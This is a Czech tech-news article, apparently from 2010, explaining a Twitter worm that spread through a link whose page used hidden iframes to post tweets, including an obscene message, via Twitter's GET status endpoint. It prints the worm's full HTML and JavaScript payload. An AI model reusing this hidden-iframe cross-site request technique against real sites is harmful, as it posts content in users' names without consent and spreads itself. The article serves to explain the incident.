Další exploit: kozy zaútočily na Twitter

Další exploit: kozy zaútočily na Twitter

Pár dní po prvním „útoku“ na Twitter zažila oblíbená sociální síť další. Tentokrát nebyl tak sofistikovaný a spíše než potenciální chyby v samotném Twitteru využíval prostých vlastností jazyka HTML a DOM API.

Možná jste si všimli, že vaši přátelé znenadání začali psát zprávičky s tímto obsahem:

„I love anal sex with goats“

Pro neznalé angličtiny:

„Mám rád anální sex s kozami“

Ještě předtím se ovšem na jejich profilu objevil tento tweet:

„WTF: http://t.co/smbuvNd

Každý, kdo na takový odkaz klepnul, se přesunul na zdánlivě prázdnou stránku, ve skutečnosti se na ní ale zpracoval Javascript. Ten vytvořil neviditelný prvek IFRAME (vložená cizí stránka uvnitř další stránky) a v tomto rámci načetl adresu http://twitter.com/share/update?status=. Jakýkoliv text za rovnítkem se pak pomocí HTTP GET metody poslal přímo na Twitter jako zcela běžná zprávička.

Klepněte pro větší obrázek
A takto se choval twitterový červ v praxi

Kód celkem vytvořil dva prvky IFRAME. V tom prvním se nejprve odeslal odkaz s „WTF“, abyste nalákali další potenciální oběti, v tom druhém pak informace o vaší sexuální preferenci.

Celý kód, který se zpracoval na záškodnické stránce:

<html>
<head></head>
<body>
<script>
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "
http://twitter.com/share/update?status=WTF: " + window.location;
el2.src = "
http://twitter.com/share/update?status=I love anal sex with goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);
</script>
</body>
</html>

Tento případ nezneužíval nějaké podstatnější chyby v Twitteru – pouze té vlastnosti, že Twitter uměl poslat zprávičku i přes HTTP GET požadavek. Jak se zdá, nyní to už není možné, pokud totiž GET požadavek upravíte a v prohlížeči navštívíte celou adresu, Twitter ohlásí neexistujícího uživatele share. Ani tentokrát nezpůsobil „virus“ nic vážného, pouze na pár jedinců (netušíme kolik) prozradil, co neměl.

Témata článku: Technologie, Web, Bezpečnost, Sociální sítě, Twitter, Status, Hidden, Love, Head

11 komentářů

Nejnovější komentáře

  • Feodaron 27. 9. 2010 19:10:01
    Ony přístup nemají, ani ho nepotřebují. Jedná se tady pouze o zaslání...
  • Juggernaut 27. 9. 2010 16:08:18
    Omlouvám se za nedovtipnost, ale mohl by mi někdo vysvětlit, proč tenhle...
  • Radim Lipovčan 27. 9. 2010 8:47:50
    Zajímavý expolit, tak alespoň někteří se o sobě a jiných dozvěděli další...
Určitě si přečtěte

Jak vybrat monitor k počítači: nenechte se zlákat nepodstatnými parametry

Jak vybrat monitor k počítači: nenechte se zlákat nepodstatnými parametry

** Na jaké parametry se zaměřit a kde vás výrobci chtějí nachytat ** Monitory se stále více specifikují pro konkrétní určení ** Náročný hráč nebo profesionální grafik mají různé požadavky

20.  6.  2017 | Tomáš Holčík | 31

Dlouhodobý test HTC Vive: co vám recenze o virtuální realitě neřeknou

Dlouhodobý test HTC Vive: co vám recenze o virtuální realitě neřeknou

** Ani hry se sebelepší grafikou vás nevtáhnou tolik, jako ve virtuální realitě ** Pro sledování filmů není VR ani zdaleka ideální ** I první generace je skvělá, stále však působí jako prototyp

20.  6.  2017 | Stanislav Janů | 22

Pojďme programovat elektroniku: Postavíme si titěrnou Wi-Fi meteostanici s lepším teploměrem než Netatmo

Pojďme programovat elektroniku: Postavíme si titěrnou Wi-Fi meteostanici s lepším teploměrem než Netatmo

** Dnes se podíváme na maličkou Wi-Fi destičku Wemos D1 mini ** A připojíme k ní barometrický a teplotní shield ** Poběží na ní web a nabídne i JSON API

18.  6.  2017 | Jakub Čížek | 28

Jak unikají informace o nových iPhonech? Třeba podprsenkami čínských pracovnic

Jak unikají informace o nových iPhonech? Třeba podprsenkami čínských pracovnic

** Na černém trhu mohou zaměstnanci továren za kradené součástky inkasovat částku ve výši ročního platu ** Velké množství informací je vyneseno i z centrály Applu ** Díly jsou pašovány v botách, podprsenkách i odpadem

21.  6.  2017 | Stanislav Janů | 24


Aktuální číslo časopisu Computer

Bojujeme proti Fake News

Dva velké testy: fotoaparáty a NASy

Co musíte vědět o změně evropského roamingu

Radíme s výběrem základní desky